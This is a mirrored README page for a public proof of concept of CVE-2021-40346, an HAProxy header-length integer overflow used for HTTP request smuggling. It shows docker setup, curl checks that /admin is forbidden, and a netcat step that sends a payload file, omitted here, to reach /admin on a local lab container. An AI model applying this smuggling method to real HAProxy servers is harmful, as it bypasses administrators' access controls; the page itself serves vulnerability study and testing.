CVE-2021-40346 PoC — Haproxy HAProxy 输入验证错误漏洞

Source

https://github.com/knqyf263/CVE-2021-40346

Associated Vulnerability

Title:Haproxy HAProxy 输入验证错误漏洞 (CVE-2021-40346)
Description:An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.

Description

CVE-2021-40346 PoC (HAProxy HTTP Smuggling)

Readme

# CVE-2021-40346
CVE-2021-40346 PoC (HAProxy HTTP Smuggling)

For educational purposes only

## Setup

```
$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4
```

## Test
Confirm `/admin` is denied.

```
$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
```

You will not see `/admin` in the log. It means the request didn't reach the backend server since HAProxy denied it.

```
$ docker logs poc
server start at port 8000
/
```

Then, you can make sure it can be bypassed by payload.txt.

```
$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked

6
hello

0
```

You will find `/admin` in the log.

```
$ docker logs poc
server start at port 8000
/
/
/admin
```

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!